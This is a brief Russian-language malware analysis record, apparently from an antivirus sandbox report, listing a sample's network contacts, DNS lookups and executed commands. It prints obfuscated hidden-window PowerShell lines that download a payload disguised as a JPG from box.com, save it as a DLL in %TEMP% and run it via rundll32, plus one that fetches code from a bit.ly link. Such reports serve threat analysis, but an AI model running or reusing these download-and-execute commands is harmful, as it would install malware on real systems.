Техническая информация
- https://app.box.com/shared/static/651ujzfffz1yhon0cpnwohj1r4yjo90d.jpg как %temp%\eoufyybhct_user_ucasl.dll
- http://bi#.ly/2k4zbtd
- 'bi#.ly':80
- 'ap#.box.com':443
- 'go###e.com.br':80
- 'ap#.box.com':443
- DNS ASK ap#.box.com
- DNS ASK bi#.ly
- DNS ASK go###e.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (NEw-ObJEct systEm.NEt.wEbcLiENt).dOwNLOadfiLE('""https://app.box.com/shared/static/651ujzfffz1yhon0cpnwohj1r4yjo90d.jpg','%TEMP%\eoufyybhct_user_ucasl.dLL');cd $ENv:TEMP ;start-prOcEss ruNdLL3...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (NEw-ObJEct NEt.wEbcLiENt).dOwNLOadstriNg('http://bi#.ly/2k4zbtd')"' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' eoufyybhct_user_ucasl.dLL starter